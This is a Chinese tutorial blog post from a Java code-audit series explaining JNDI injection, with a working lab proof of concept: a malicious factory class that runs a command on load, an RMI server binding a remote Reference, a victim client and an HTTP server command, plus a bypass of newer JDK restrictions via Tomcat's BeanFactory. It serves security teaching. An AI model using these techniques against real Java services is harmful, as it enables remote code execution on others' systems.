Java代码审计系列之 JNDI注入

最新推荐文章于 2024-05-01 19:17:00 发布
最新推荐文章于 2024-05-01 19:17:00 发布
阅读量1.4k 收藏 3
点赞数 2
分类专栏: 代码审计 Java 文章标签: java 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyj123480/article/details/117698137
版权

Java代码审计系列之 JNDI注入

0x01 前言

在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRMP这些概念,其中RMI是一个基于序列化的Java远程方法调用机制。作为一个常见的反序列化入口,它和反序列化漏洞有着千丝万缕的联系。除了直接攻击RMI服务接口外(比如:CVE-2017-3241),我们在构造反序列化漏洞利用时也可以结合RMI方便的实现远程代码执行。

我们在之前的课程中说到过动态类的加载,而jndi注入就是利用动态类的加载来完成攻击的,在这之前,我们先来了解一下jndi注入的基础知识

0x02 啥是jndi

JNDI是 Java 命名与目录接口(Java Naming and Directory Interface),在J2EE规范中是重要的规范之一,有不少大佬可能认为,没有透彻理解JNDI的意义和作用,就没有真正掌握J2EE特别是EJB的知识。

我们来举个常规的JDBC的例子

Connection jdbcconn=null; 
try { 
	Class.forName("com.mysql.jdbc.Driver"); 
	jdbcconn=DriverManager.getConnection("jdbc:mysql://MyDBServer?user=xxx&password=xxx"); 
	...... 
	jdbcconn.close(); 
} catch(Exception e) { 
	e.printStackTrace(); 
} finally { 
	if(jdbcconn!=null) { 
		try { 
			jdbcconn.close(); 
		} catch(SQLException e) {
      
    } 
}

这是常规的链接数据库的例子,也是其他语言程序员的常见做法。

优点

  1. 无可厚非这种方法在小规模的开发过程中不会有任何影响,只要程序员熟悉Java和Mysql,就可以很快开发出相应的程序。

缺点

1、数据库服务器地址和名称 、用户名和口令都可能需要改变,由此引发JDBC URL需要修改;
2、数据库可能改用别的产品,如改用DB2或者Oracle,引发JDBC驱动程序包和类名需要修改;
3、随着实际使用终端的增加,原配置的连接池参数可能需要调整;

如何解决

在对于Java这种强抽象模式的编程语言来说,肯定不会允许这么LowB的存在,程序员不应该关注后台的数据库是啥,版本是多少。所以为了统一化管理,就诞生了JNDI

0x03 使用JNDI

在一开始很多人都会被jndi、rmi这些词汇搞的晕头转向,而且很多文章中提到了可以用jndi调用rmi,就更容易让人发昏了。我们只要知道jndi是对各种访问目录服务的逻辑进行了再封装,也就是以前我们访问rmi与ldap要写的代码差别很大,但是有了jndi这一层,我们就可以用jndi的方式来轻松访问rmi或者ldap服务,这样访问不同的服务的代码实现基本是一样的。

代码实现

JNDI中有绑定和查找的方法:

- bind:将第一个参数绑定到第二个参数的对象上面
- lookup:通过提供的名称查找对象

我们来举个例子:

IHello.java

package com.evalshell.jndi;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface IHello extends Remote {
    public String SayHello(String name) throws RemoteException;
}

IHelloImpl.java

package com.evalshell.jndi;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class IHelloImpl extends UnicastRemoteObject implements IHello {
    public IHelloImpl() throws RemoteException {
        super();
    }

    @Override
    public String SayHello(String name) throws RemoteException {
        return "Hello " + name;
    }
}

CallService.java


package com.evalshell.jndi;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.Properties;

public class CallService {
    public static void main(String[] args) throws Exception{
        Properties env = new Properties();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        env.put(Context.PROVIDER_URL, "rmi://localhost:1099");

        Context ctx = new InitialContext(env);

        Registry registry = LocateRegistry.createRegistry(1099);

        IHello hello = new IHelloImpl();

        registry.bind("hello", hello);

        IHello rhello = (IHello) ctx.lookup("rmi://localhost:1099/hello");

        System.out.println(rhello.SayHello("fengxuan"));
    }
}

由于上面的代码将服务端与客户端写到了一起,所以看着不那么清晰,我看到很多文章里吧JNDI工厂初始化这一步操作划分到了服务端,我觉得是错误的,配置jndi工厂与jndi的url和端口应该是客户端的事情。

可以对比一下前几章的rmi demo与这里的jndi demo访问远程对象的区别,加深理解

JNDI注入

注入的原理

我们来到JNDI注入的核心部分,关于JNDI注入,@pwntester在BlackHat上的讲义中写的已经很详细。我们这里重点讲一下和RMI反序列化相关的部分。接触过JNDI注入的同学可能会疑问,不应该是RMI服务器最终执行远程方法吗,为什么目标服务器lookup()一个恶意的RMI服务地址,会被执行恶意代码呢?

在JNDI服务中,RMI服务端除了直接绑定远程对象之外,还可以通过References类来绑定一个外部的远程对象(当前名称目录系统之外的对象)。绑定了Reference之后,服务端会先通过Referenceable.getReference()获取绑定对象的引用,并且在目录中保存。当客户端在lookup()查找这个远程对象时,客户端会获取相应的object factory,最终通过factory类将reference转换为具体的对象实例。

整个利用流程如下:

  1. 目标代码中调用了InitialContext.lookup(URI),且URI为用户可控;
  2. 攻击者控制URI参数为恶意的RMI服务地址,如:rmi://hacker_rmi_server//name;
  3. 攻击者RMI服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;
  4. 目标在进行lookup()操作时,会动态加载并实例化Factory类,接着调用factory.getObjectInstance()获取外部远程对象实例;
  5. 攻击者可以在Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码,达到RCE的效果;

在这里,攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。我们跟入lookup()函数的代码中,可以看到JNDI中对Reference类的处理逻辑,最终会调用NamingManager.getObjectInstance():

实战案例

  1. 首先创建一个恶意的对象

    package com.evalshell.jndi;

import javax.lang.model.element.Name;
import javax.naming.Context;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.HashMap;

public class BadObject {
    public static void exec(String cmd) throws IOException {
        String sb = "";
        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
        String lineStr;
        while((lineStr = inBr.readLine()) != null){
            sb += lineStr+"\n";

        }
        inBr.close();
        inBr.close();
    }

    public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception{
        return null;
    }

    static {
        try{
            exec("gnome-calculator");
        }catch (Exception e){
            e.printStackTrace();
        }
    }

}

可以看到这里利用的是static代码块执行命令

  1. 创建rmi服务端,绑定恶意的Reference到rmi注册表
package com.evalshell.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Server {
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1100);
        String url = "http://127.0.0.1:7777/";
        System.out.println("Create RMI registry on port 1100");
        Reference reference = new Reference("EvilObj", "EvilObj", url);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("evil", referenceWrapper);
    }

}

  1. 创建一个客户端(受害者)

    package com.evalshell.jndi;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class Client {
    public static void main(String[] args) throws NamingException {
        Context context = new InitialContext();
        context.lookup("rmi://localhost:1100/evil");
    }
}

    可以看到这里的lookup方法的参数是指向我设定的恶意rmi地址的。

    然后先编译该项目,生成class文件,然后在class文件目录下用python启动一个简单的HTTP Server:

    python -m SimpleHTTPServer 7777

    执行上述命令就会在7777端口、当前目录下运行一个HTTP Server:

    然后运行Server端,启动rmi registry服务

    如果是JDK1.7的版本,就可以运行成功

    JDK1.8 最后运行报错

    而此时使用JNDI Server返回恶意Reference是可以成功利用的,因为JDK 8u191以后才对LDAP JNDI Reference进行了限制。

    Tips: 测试过程中有个细节,我们在JDK 8u102中使用RMI Server + JNDI Reference可以成功利用,而此时我们手工将 com.sun.jndi.rmi.object.trustURLCodebase 等属性设置为false,并不会如预期一样有高版本JDK的限制效果出现,Payload依然可以利用。

绕过高版本JDK限制:利用本地Class作为Reference Factory

在高版本中(如:JDK8u191以上版本)虽然不能从远程加载恶意的Factory,但是我们依然可以在返回的Reference中指定Factory Class,这个工厂类必须在受害目标本地的CLASSPATH中。工厂类必须实现 javax.naming.spi.ObjectFactory 接口,并且至少存在一个 getObjectInstance() 方法。org.apache.naming.factory.BeanFactory 刚好满足条件并且存在被利用的可能。org.apache.naming.factory.BeanFactory 存在于Tomcat依赖包中,所以使用也是非常广泛。

org.apache.naming.factory.BeanFactory 在 getObjectInstance() 中会通过反射的方式实例化Reference所指向的任意Bean Class,并且会调用setter方法为所有的属性赋值。而该Bean Class的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的。

风炫安全
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
完整的Java代码审计学习笔记资源(免费下载)
10-31
.gitignore 第一的 4年前 自述文件.md 添加一些关于 jndi 的内容 3年前 java代码审计-sqli.md 第一的 4年前 java代码审计-ssrf.md ...java代码审计-ssti.md ...java代码审计-xss.md ...java代码审计-表达式注入.md 第一的
JNDI注入是什么呀?
热门推荐
YvesHe的专栏
08-26 3万+
0x01 前言 我们在上一章《攻击rmi的方式》中提到了rmi的一大特性——动态类加载。而jndi注入就是利用的动态类加载完成攻击的。在谈jndi注入之前,我们先来看看关于jndi的基础知识 0x02 jndi是个啥 jndi的全称为Java Naming and Directory Interface(java命名和目录接口)SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统
程序包com.sun.tools.javac.util不存在问题的两种解决方法
qq_34437972的博客
09-30 2万+
在项目开发中遇到“程序包com.sun.tools.javac.util不存在”的错误,找到两种解决办法。 方法一: File-》Project Structure-》Libraries 点击“+”,选择java,找到本地JDK下的lib\tools.jar文件,添加到相应模块,点击ok,最后点击Apply即可。 方法二: 在方法一解决不了的基础上,可以尝试第二种方法。 1、File-》Project Structure-》Project,查看对应JDK版本。 2、File-...
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 1168
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
Error(6,35)java: 程序包 不存在,解决办法
weixin_43173021的博客
08-28 1万+
Error(6,35)java: 程序包 不存在,解决办法 spring boot项目,运行就提示找不到程序包,执行了maven clean ,maven install,maven依赖没有标红,但启动就报错 解决办法 检查maven依赖是否成功导入 根据报错信息,检查本地仓库是否有jar,有些jar包不会自动导入,需要手动导一下,导jar的过程就不细说了!如果没有解决,不要急,看下面 勾选settings->Maven->Runner->Delegate IDE bulid 按照上图
安全技术系列JNDI注入
好记性不如烂笔头
09-28 5312
JDNI注入总结
JNDI注入学习(看不懂直接喷,别忍着!)
一剑开天门!的博客
01-13 2311
JNDI注入学习(看不懂直接喷,别忍着!)
JAVA安全之Log4j-Jndi注入原理以及利用方式
shelter1234567的博客
11-08 1730
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式
JNDI注入利用原理及绕过高版本JDK限制
mole_exp的博客
11-07 7045
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过高版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
Log4j2JNDI注入漏洞复现测试
zhangxm_qz的博客
12-19 2965
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
bank.rar_bank java_jndi
09-14
这是一个简单的网上查询账户功能,根据不同用户的余额,返回不同的响应。 此项目应用了mvc模式、 el、 jndi、 sql 一些目前比较流行的技术,可以给大家在开发中作为参考!
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用...
C#(C Sharp)学习笔记_类【十五】
追求细节,成就完美
05-01 468
类(Class)是面向对象程序设计(OOP,Object-Oriented Programming)实现信息封装的基础。类是一种用户定义的引用数据类型,也称类类型。每个类包含数据说明和一组操作数据或传递消息的函数。类的实例称为对象。
链表刷题集
yajunjiao的专栏
04-30 628
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
Spring Cloud——LoadBalancer
最新发布
????
05-01 1593
这里只是简单的讲解了一下LoadBalancer如何使用,因为实际上我们使用的不是很多,主要还是使用OpenFeign。
d15(136-148)-勇敢开始Java,咖啡拯救人生
m0_73459387的博客
04-28 1208
对象哈希值的特点:同一个对象调用hashCode()返回的哈希值相同;HashMap的键依赖hashCode方法和equals方法保证键的唯一,存储自定义类型的对象时,重写这两个方法。实际上,Set系列集合的底层就是基于Map实现的,只是Set集合中的元素要键数据,不要值数据。当12个位置都占满时就会扩容,大约扩容为原来的二倍,再把原数组数据转移到新数组。使用迭代器遍历集合时,又同时在删除集合中的数据,程序就会出现并发修改异常的错误。基于哈希表实现,每个键值对额外多了一个双链表的机制,记录元素顺序(保证。
Java解决最长公共前缀
无人罪的博客
04-28 519
编写一个函数来查找字符串数组中的最长公共前缀。如果不存在公共前缀,返回空字符串""。
weblogic jndi注入漏洞利用
12-11
攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值